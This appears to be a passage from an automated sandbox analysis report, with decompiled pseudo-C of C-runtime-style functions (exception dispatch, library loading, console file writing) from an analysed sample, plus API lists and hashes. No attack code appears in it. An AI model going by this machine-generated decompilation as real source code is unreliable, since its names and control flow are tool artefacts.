							do {
								_t86 = 5;
								_t73 = memcpy( &_v60,  *((intOrPtr*)( *_t70 + 0x10)) + _t85, _t86 << 2);
								_t115 = _t115 + 0xc;
								if(_v60 <= _t73 && _t73 <= _v56) {
									_t76 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t91 = _t76[4];
									if(_t91 == 0 ||  *((char*)(_t91 + 8)) == 0) {
										if(( *_t76 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00BD7E87(_t94, _t79, _a8, _a12, _a16, _a20, _t76, 0,  &_v60, _a28, _a32);
											_t94 = _v8;
											_t115 = _t115 + 0x30;
										}
									}
								}
								_t94 = _t94 + 1;
								_t70 = _v16;
								_t85 = _v12 + 0x14;
								_v8 = _t94;
								_v12 = _t85;
							} while (_t94 < _v28);
						}
						goto L16;
					}
					E00BD1C3C(_t79, _t81, _t93, 0, _t102);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_v80 = _v64 + 0xc;
					_t64 = E00BD6260(_v68, _v60);
					_t65 =  *_t64(0, _t102, _t113, _t81, _t79, _t107);
					_pop(_t110);
					_t83 = _v60;
					if(_v60 == 0x100) {
						_t83 = 2;
					}
					return E00BD6260(_t65, _t83);
				}
			}






































                          0x00bd7f07
                          0x00bd7f07
                          0x00bd7f07
                          0x00bd7f0e
                          0x00bd7f17
                          0x00bd8036
                          0x00bd7f1d
                          0x00bd7f1d
                          0x00bd7f1e
                          0x00bd7f1f
                          0x00bd7f29
                          0x00bd7f2c
                          0x00bd7f32
                          0x00bd7f3c
                          0x00bd7f61
                          0x00bd7f66
                          0x00bd7f6b
                          0x00bd8032
                          0x00000000
                          0x00bd8033
                          0x00bd7f6b
                          0x00bd7f3c
                          0x00bd7f71
                          0x00bd7f74
                          0x00bd7f77
                          0x00bd7f7d
                          0x00bd7f95
                          0x00bd7f9a
                          0x00bd7f9d
                          0x00bd7fa0
                          0x00bd7fa3
                          0x00bd7fa6
                          0x00bd7fac
                          0x00bd7fb2
                          0x00bd7fb5
                          0x00bd7fb8
                          0x00bd7fc7
                          0x00bd7fc8
                          0x00bd7fc8
                          0x00bd7fcd
                          0x00bd7fe0
                          0x00bd7fe2
                          0x00bd7fe7
                          0x00bd7ff2
                          0x00bd7ff4
                          0x00bd7ff6
                          0x00bd8012
                          0x00bd8017
                          0x00bd801a
                          0x00bd801a
                          0x00bd7ff2
                          0x00bd7fe7
                          0x00bd8020
                          0x00bd8021
                          0x00bd8024
                          0x00bd8027
                          0x00bd802a
                          0x00bd802d
                          0x00bd7fb8
                          0x00000000
                          0x00bd7fac
                          0x00bd8037
                          0x00bd803c
                          0x00bd803d
                          0x00bd803e
                          0x00bd803f
                          0x00bd804e
                          0x00bd805e
                          0x00bd8065
                          0x00bd806b
                          0x00bd806c
                          0x00bd8078
                          0x00bd807a
                          0x00bd807a
                          0x00bd8089
                          0x00bd8089

                          APIs
                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00BD7E0D,?,?,00000000,00000000,00000000,?), ref: 00BD7F2C
                          • CatchIt.LIBVCRUNTIME ref: 00BD8012
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CatchEncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 1435073870-2084237596
                          • Opcode ID: 0bb3774276baa14baa0508e5ad3cefeaf107f097f9451cbcbadb9e10e5958baf
                          • Instruction ID: f79f72a04eba236f7e420f96e500088d6f64eff143b3acda7b252c2390273f41
                          • Opcode Fuzzy Hash: 0bb3774276baa14baa0508e5ad3cefeaf107f097f9451cbcbadb9e10e5958baf
                          • Instruction Fuzzy Hash: A2414975900249AFCF26DF98CC81AEEBBF5FF48314F18409AF904AB251E735A950DB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC3210 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41timewindowCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: MessagePostTimer
                          • String ID: 2$2
                          • API String ID: 2370412193-3784399050
                          • Opcode ID: fdede31c41a4c77744416b9a4f81e9766c8e3396572488db13c9c87d5eda5e2e
                          • Instruction ID: 14519b8a2f48ebe8d5ca6499549a74224cf98dbbda9ff692056c3e88a690c802
                          • Opcode Fuzzy Hash: fdede31c41a4c77744416b9a4f81e9766c8e3396572488db13c9c87d5eda5e2e
                          • Instruction Fuzzy Hash: 14119574104204EFDB40EF58D189BA97BE0FB04754F85C4A9F8898F291D7B59A84DF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD60E6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00BD60E6(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E00BD4AB9(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                          0x00bd60f3
                          0x00bd60fb
                          0x00bd6130
                          0x00bd60fd
                          0x00bd6106
                          0x00000000
                          0x00bd612d
                          0x00bd612c
                          0x00bd612c

                          APIs
                          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00BD6182,?,?,00000000,?,?,?,00BD5FCA,00000000,FlsAlloc,00BDD668,00BDD670), ref: 00BD60F3
                          • GetLastError.KERNEL32(?,00BD6182,?,?,00000000,?,?,?,00BD5FCA,00000000,FlsAlloc,00BDD668,00BDD670,?,?,00BD1C8A), ref: 00BD60FD
                          • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00BD1C8A,00BD1D6E,00000003,00BD14EB,?,?,?,?,00000000,00000000,00000000), ref: 00BD6125
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID: api-ms-
                          • API String ID: 3177248105-2084034818
                          • Opcode ID: 724329961c425ce62b6700f5c1ba2a0763fa2ac5545ca456a85b7fce5f30c762
                          • Instruction ID: e8753e713a4d15a49d3127daf1da40b5e1d6c9c01e19efe039b741ba7b6cc915
                          • Opcode Fuzzy Hash: 724329961c425ce62b6700f5c1ba2a0763fa2ac5545ca456a85b7fce5f30c762
                          • Instruction Fuzzy Hash: 5BE04F30680248BBEB101F65EC47F587FA8EB04B80F20C472F90DB82E2EFB1D8548944
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD6A21 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E00BD6A21(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(0xbdafed);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0xbe4050; // 0xbb40e64e
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0xbe62e0 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E00BD14F0(_t265, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0xbe62e0 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0xbe62e0 + _v84 * 4) + _t300 + 0x2d) =  *( *(0xbe62e0 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E00BD87A5(_t273,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E00BD87A5(_t273);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0xbe47b0; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0xbe62e0 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E00BD89E0( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0xbe47b0)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0xbe62e0 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E00BCF710( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0xbe62e0 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E00BD89E0( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E00BD5A89(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E00BCDB85(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}





















































































                          0x00bd6a26
                          0x00bd6a28
                          0x00bd6a33
                          0x00bd6a34
                          0x00bd6a37
                          0x00bd6a3c
                          0x00bd6a3e
                          0x00bd6a44
                          0x00bd6a48
                          0x00bd6a4e
                          0x00bd6a53
                          0x00bd6a59
                          0x00bd6a5c
                          0x00bd6a5f
                          0x00bd6a62
                          0x00bd6a65
                          0x00bd6a68
                          0x00bd6a72
                          0x00bd6a79
                          0x00bd6a81
                          0x00bd6a84
                          0x00bd6a8a
                          0x00bd6a8e
                          0x00bd6a91
                          0x00bd6a95
                          0x00bd6a95
                          0x00bd6a9d
                          0x00bd6aa5
                          0x00bd6aaa
                          0x00bd6aab
                          0x00bd6aac
                          0x00bd6aad
                          0x00bd6ab0
                          0x00bd6ab2
                          0x00bd6ab8
                          0x00bd6abe
                          0x00bd6ac1
                          0x00bd6ac3
                          0x00bd6ac6
                          0x00bd6acf
                          0x00bd6ad5
                          0x00bd6ad8
                          0x00bd6adf
                          0x00bd6ae6
                          0x00bd6ae9
                          0x00bd6c23
                          0x00bd6c27
                          0x00bd6c2a
                          0x00bd6c4d
                          0x00bd6c53
                          0x00bd6c55
                          0x00bd6c59
                          0x00bd6c8a
                          0x00bd6c8d
                          0x00bd6c8f
                          0x00000000
                          0x00bd6c5b
                          0x00bd6c5b
                          0x00bd6c5e
                          0x00bd6c61
                          0x00bd6c64
                          0x00bd6dae
                          0x00bd6dbc
                          0x00bd6dc5
                          0x00bd6c6a
                          0x00bd6c74
                          0x00bd6c79
                          0x00bd6c7c
                          0x00bd6c7f
                          0x00bd6c85
                          0x00000000
                          0x00bd6c85
                          0x00bd6c7f
                          0x00bd6c64
                          0x00bd6c2c
                          0x00bd6c33
                          0x00bd6c36
                          0x00bd6c39
                          0x00bd6c3b
                          0x00bd6c3e
                          0x00bd6c45
                          0x00bd6c47
                          0x00bd6c90
                          0x00bd6c93
                          0x00bd6c94
                          0x00bd6c99
                          0x00bd6c9c
                          0x00bd6c9f
                          0x00bd6ca5
                          0x00000000
                          0x00bd6ca5
                          0x00bd6c9f
                          0x00bd6aef
                          0x00bd6af2
                          0x00bd6af4
                          0x00bd6af6
                          0x00bd6afa
                          0x00bd6afb
                          0x00bd6aff
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd6aff
                          0x00bd6b04
                          0x00bd6b06
                          0x00bd6b0b
                          0x00bd6bcb
                          0x00bd6bd2
                          0x00bd6bd3
                          0x00bd6bd6
                          0x00bd6bd8
                          0x00bd6d88
                          0x00bd6d8a
                          0x00000000
                          0x00bd6d8c
                          0x00bd6d8c
                          0x00bd6d8f
                          0x00bd6d9e
                          0x00bd6da2
                          0x00bd6da3
                          0x00bd6da3
                          0x00000000
                          0x00bd6da7
                          0x00000000
                          0x00bd6bde
                          0x00bd6be3
                          0x00bd6be6
                          0x00bd6be9
                          0x00bd6bef
                          0x00bd6bf8
                          0x00bd6c03
                          0x00bd6c08
                          0x00bd6c0b
                          0x00bd6c0e
                          0x00bd6c17
                          0x00bd6c17
                          0x00bd6c1a
                          0x00000000
                          0x00bd6c1a
                          0x00bd6c0e
                          0x00bd6b11
                          0x00bd6b14
                          0x00bd6b1a
                          0x00bd6b1c
                          0x00bd6b29
                          0x00bd6b2a
                          0x00bd6b2d
                          0x00bd6b30
                          0x00bd6b35
                          0x00bd6d59
                          0x00bd6d5b
                          0x00bd6d5d
                          0x00bd6d60
                          0x00bd6d63
                          0x00bd6d6f
                          0x00bd6d72
                          0x00bd6d74
                          0x00bd6d75
                          0x00bd6d79
                          0x00bd6d7c
                          0x00bd6d7c
                          0x00bd6d80
                          0x00bd6d80
                          0x00bd6d80
                          0x00bd6d83
                          0x00bd6d83
                          0x00bd6b3b
                          0x00bd6b3b
                          0x00bd6b3e
                          0x00bd6b40
                          0x00bd6b43
                          0x00bd6b45
                          0x00bd6b49
                          0x00bd6b4a
                          0x00bd6b4b
                          0x00bd6b4f
                          0x00bd6b54
                          0x00bd6b5e
                          0x00bd6b63
                          0x00bd6b66
                          0x00bd6b66
                          0x00bd6b69
                          0x00bd6b6c
                          0x00bd6b6e
                          0x00bd6b71
                          0x00bd6b7a
                          0x00bd6b7e
                          0x00bd6b7f
                          0x00bd6b86
                          0x00bd6b8c
                          0x00bd6b94
                          0x00bd6b9f
                          0x00bd6ba4
                          0x00bd6baf
                          0x00bd6bb4
                          0x00bd6bba
                          0x00bd6bc3
                          0x00bd6c1d
                          0x00bd6c1d
                          0x00bd6ca8
                          0x00bd6cad
                          0x00bd6cbf
                          0x00bd6cc4
                          0x00bd6cc7
                          0x00bd6ccc
                          0x00bd6ce7
                          0x00bd6dca
                          0x00bd6dd0
                          0x00bd6ced
                          0x00bd6ced
                          0x00bd6cf8
                          0x00bd6cfa
                          0x00bd6cfd
                          0x00bd6d06
                          0x00bd6d10
                          0x00000000
                          0x00bd6d12
                          0x00bd6d14
                          0x00bd6d16
                          0x00bd6d2f
                          0x00000000
                          0x00bd6d35
                          0x00bd6d39
                          0x00bd6d3f
                          0x00bd6d42
                          0x00bd6d48
                          0x00bd6d4b
                          0x00000000
                          0x00bd6d4b
                          0x00bd6d39
                          0x00bd6d2f
                          0x00bd6d10
                          0x00bd6d06
                          0x00bd6ce7
                          0x00bd6ccc
                          0x00bd6bba
                          0x00bd6b35
                          0x00bd6b0b
                          0x00000000
                          0x00bd6d4e
                          0x00bd6d4e
                          0x00bd6d57
                          0x00bd6dd2
                          0x00bd6dd7
                          0x00bd6ddf
                          0x00bd6de0
                          0x00bd6de1
                          0x00bd6ded
                          0x00000000

                          APIs
                          • GetConsoleOutputCP.KERNEL32(BB40E64E,?,00000000,?), ref: 00BD6A84
                            • Part of subcall function 00BD5A89: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00BD64FD,?,00000000,-00000008), ref: 00BD5B35
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BD6CDF
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00BD6D27
                          • GetLastError.KERNEL32 ref: 00BD6DCA
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: 38a4151102046408060f2a5882afe19581f976a3b990468980e688c53600540f
                          • Instruction ID: fc84b8c738610c3a19ad2087a7001c1ca18ec8da9abc63e2eaa12a8eaa91a840
                          • Opcode Fuzzy Hash: 38a4151102046408060f2a5882afe19581f976a3b990468980e688c53600540f
                          • Instruction Fuzzy Hash: F5D14775E002589FCB15CFA8D880AADFBF5FF09304F1845AAE955EB351E730A951CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD790B Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 70%
                          			E00BD790B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0xbe3388);
				E00BCD960(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00BCF710(_t107, E00BCDDA0(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00BCF710(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0xbe5dcc;
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0xbe7000();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00BD1C3C(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0xbe33a8);
									E00BCD960(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00BD790B(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00BD739D(_t103, _t108[0x18], E00BCDDA0( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00BD73AD(_t103, _t108[0x18], E00BCDDA0( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
